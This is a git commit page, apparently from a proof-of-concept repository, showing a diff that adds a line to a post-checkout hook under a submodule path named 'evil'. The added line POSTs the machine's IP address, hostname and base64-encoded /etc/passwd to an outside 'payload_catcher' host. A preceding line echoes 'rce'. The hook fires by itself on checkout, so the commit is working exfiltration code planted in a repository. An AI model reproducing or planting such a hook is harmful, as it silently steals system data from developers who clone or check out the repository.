Update modules/1/2/3/4/evil/hooks/post-checkout

This commit is contained in:
z0rs 2024-01-11 22:51:05 -06:00
parent 17e246ea3f
commit 0b7b2020c8
1 changed files with 1 additions and 0 deletions

View File

@ -1,2 +1,3 @@
#!/bin/bash
echo 'rce';
curl -X POST https://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)";